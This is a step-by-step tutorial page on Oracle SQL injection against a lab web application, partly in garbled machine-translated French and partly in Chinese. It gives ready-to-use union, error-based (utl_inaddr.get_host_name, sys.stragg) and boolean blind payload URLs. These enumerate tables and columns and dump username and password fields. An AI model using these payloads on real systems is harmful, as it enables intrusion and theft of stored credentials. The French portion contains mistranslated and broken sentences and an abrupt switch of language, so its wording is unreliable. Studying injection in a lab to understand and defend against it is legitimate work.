Maison  >  Article  >  base de données  >  Vous apprendre étape par étape à maîtriser complètement les petits détails de l'injection Oracle

Vous apprendre étape par étape à maîtriser complètement les petits détails de l'injection Oracle

WBOY
WBOYavant
2022-01-21 18:23:362389parcourir

Cet article vous apporte des connaissances pertinentes sur l'injection Oracle, y compris les étapes de base de l'injection et du rapport d'erreurs. J'espère qu'il sera utile à tout le monde. ◆ .

• table user_tablesVous apprendre étape par étape à maîtriser complètement les petits détails de l'injection Oracle

◆ La colonne table_name de cette table stocke toutes les tables de la base de données actuelle.

• table user_tab_columns

◆ Le nom_colonne de cette table stocke toutes les colonnes de la table.

2. Les requêtes Oracle doivent apporter le nom de la table

• Comme select * from xxx (il existe une table universelle : dual table).

3. Si une sous-requête à une seule ligne renvoie plusieurs lignes, vous devez utiliser which rownum=1 pour la standardiser

• rownum est un pseudo-numéro de séquence, commençant toujours à 1.

• L'ordre dans lequel la base de données Oracle lit les données des fichiers de données ou des tampons.

• Lorsqu'il obtient le premier enregistrement, la valeur du numéro de ligne est 1, le deuxième enregistrement est 2, et ainsi de suite.

4. Certaines fonctions intégrées nécessaires à l'injection ultérieure de base

1. Utilisation de length() :

length(char) : renvoie la longueur de la chaîne.

2. COUNT(*) Utilisation :

Fonction COUNT(*), renvoie le nombre de lignes sélectionnées dans la sélection donnée.

3. Utilisation d'ascii() :

ascii(char) signifie convertir des caractères en codes ASCII.

4. Utilisation de SUBSTR :

SUBSTR(chaîne source, position de départ de la recherche, [longueur]) La valeur de retour est une chaîne avec la position de départ et la longueur spécifiées dans la chaîne source.

5. Utilisation d'INSTR :

INSTR (chaîne source, chaîne à trouver, à partir de quel caractère, quel numéro de séquence correspondant à trouver) renvoie la position trouvée, si elle n'est pas trouvée, renvoie 0. L'ordre de recherche par défaut est de gauche à droite. Lorsque la position de départ est un nombre négatif, la recherche commence par la droite. Si la position de départ est 0, la valeur de retour est 0.

Certaines fonctions seront également expliquées lors de leur utilisation dans les articles suivants.

2. Étapes de base pour chaque type d'injection de base

L'environnement est une simple page Web utilisant jsp+Oracle sur VMware avec win2003 comme système. 1.Injection de requête conjointe Oracle

1. Trouver le point d'injection

Cette étape est très évidente dans mon environnement expérimental, mais dans l'environnement réel, vous devez toujours trouver le point d'injection approprié. Recherchez la zone de saisie qui interagit avec la base de données, puis déterminez le type de données de la zone de saisie et la méthode de fermeture de ses données, puis ajoutez quelques déclarations de jugement pour voir s'il y a injection.

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' or 1=2 --

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=2 --
Après avoir ajouté manuellement une donnée, en construisant différentes charges utiles, nous avons découvert que l'URL présentait une vulnérabilité d'injection et la charge utile que nous avons saisie a produit son effet.

3. Déterminez le nombre de colonnes

La base de données Oracle utilise également order by pour déterminer le nombre de colonnes dans la table de données de requête. Order by doit être le nombre de colonnes dans l'expression de liste de sélection et le nombre. de colonnes dans un tableau dans l'environnement réel. Il peut y en avoir un grand nombre, il est donc préférable d'utiliser la méthode de dichotomie pour évaluer le nombre de colonnes.

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' order by 3 --

La page est normale lorsqu'on commande par 3, mais une erreur se produit lorsqu'on commande par 4, donc le nombre de colonnes dans la table de requête est de 3

4.Oracle联合查询

  跟之前的学习的MySQL以及SQL server一样,Oracle同样通过union 来实现联合查询注入,并且不用跟SQL server联合查询注入一样添加all,仅只用union就行,但是依旧要跟SQL server联合查询注入一样判断后续各列的数据类型。

  接下里我们首先查看回显位

http://10.1.5.34:8080/SqlInjection/selcet? union select null,null,null from dual --

  因为在Oracle数据库中的select查询语句必须跟上查询列表,所以在union后面的select查询语句我们必须跟上from dual ,dual表是Oracle数据库中自带的虚拟表,可当万能用。

  我们看到三个列全部会回显在页面上

  下面我们还要通过更改null判断各个回显位的数据类型

http://10.1.5.34:8080/SqlInjection/selcet? union select '1',null,null from dual --

 判断出1号位的数据类型位字符型,接下来我们就可以通过构造不同的payload替换'1',来查询到我们想要的数据

select user from dual 获取用户名

http://10.1.5.34:8080/SqlInjection/selcet? union select user,null,null from dual --

select banner from sys.v_$version where rownum=1 获取版本

http://10.1.5.34:8080/SqlInjection/selcet? union select banner,null,null from sys.v_$version where rownum=1 --

 借助联合查询和默认表 user_tables获取当前数据库所有表名(第一行的)。

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select table_name,null,null from user_tables where rownum=1--

 查看下一行表名

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select table_name,null,null from user_tables where rownum=1 and table_name<>'T_USER'--

没有其他的表,只有T_USER

如果可以显示多行数据,则可以通过以下代码查看到T-USER所有的列名,不能就只能通过跟上面类似的方法 用“<>”添加附加条件,去除已经查看到的数据然后查看下一行数据

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select column_name,null,null from user_tab_columns where table_name='T_USER'--

获取T_USER表中字段为SNAME、SUSER、SPWD,然后获得他们的值

因为之前判断过1,2,3号位都回显,且都为字符型,所以下面一次性查询,如果只有一个也可以一个一个的查询

10.1.5.34:8080/SqlInjection/selcet?sname=1' union select SNAME,SUSER,SPWD from T_USER--

获取数据

  因为靶场比较简陋,所以实验过程只是体现自己的注入思路,并不代表T_USER表中的东西就是后台账号之内的敏感数据,真实环境中,你查询的数据可以是任何你能查询到数据。

2.Oracle报错注入

1.寻找注入点

   当你发现你找到的注入点在输入错误数据会反弹数据库原始报错信息时,我们就可以使用报错注入。然后前面的步骤基本一致,都是先找注入点,然后分析闭合方式。

2.报错注入

Oracle报错注入——类型转换错误和报错函数。

payload:1=utl_inaddr.get_host_name((SQL语句))

查询结果: ORA-29257: 未知的主机 结果

10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1)) --

T_USER即我们想要查询的表名,如果不止一个也可以通过上面联合查询注入中提到的方法,在sql语句中添加附加'<>'条件遍历表名。

跟联合查询用到的相同的语句查到接下来的列名,数据

下面我们可以用到一个函数来改变之前遍历每个数据的麻烦:sys.stragg()在单行中获取所有行信息。

10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=utl_inaddr.get_host_name((select sys.stragg('~'||SUSER||'~') from T_USER))--

  ||是Oracle中的字符拼接符号,在以上payload使用的时候需要将其更改为%7C%7C,即它的url编码

  我们通过拼接其他符号以及sys,stragg()函数使我们能够清晰的分辨数据表中这个字段每一行的数据,在之前的联合查询注入同样可以使用到这个函数,省去遍历的麻烦

3.Oracle布尔盲注

1.寻找注入点

使用条件:HTTP返回包中没有执行结果的数据和报错信息。

当你发出你构造的payload时,页面并没有产生变化,即说明你的payload正确。

跟上面两种注入一样寻找注入点。

Oracle盲注核心——字符串截取函数、ascii转换函数、条件判断语句。

要注意的是在截断函数中长度是包含开始截取位置那一位的。

2.Oracle布尔盲注

步骤跟之前的顺序是一致的 拿表名-列名-数据,这里就不一一列举了,主要说重点。

我们在拿一个数据时,比如说表名,我们需要先判断他的长度

10.1.5.34:8080/SqlInjection/selcet?suser=&sname=1' and (select length(table_name) from user_tables where rownum=1)=6--

 我们可以先将=改为>或者<然后通过二分法逐步的缩小范围,最终确定表名一共有6位。

http://10.1.5.34:8080/SqlInjection/selcet?sname=1&#39; and (select ascii(substr(table_name,1,1)) from user_tables where rownum=1)=84--

然后就用截取函数 先截取表名的第一个字符,然后转译为ascii码,同样可以通过>或者<逐渐缩小范围最终确定表名第一个字符ascii码为84 即为T,以此类推获得完整表名

如果会使用burpsuit的话,可以通过burpsuit暴力破解,设置截取位置以及等于号后面的数字来跑出表名。

所有数据均可使用同样的方法获取

推荐教程:《Oracle教程

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer
Article précédent:A quoi sert with dans OracleArticle suivant:A quoi sert with dans Oracle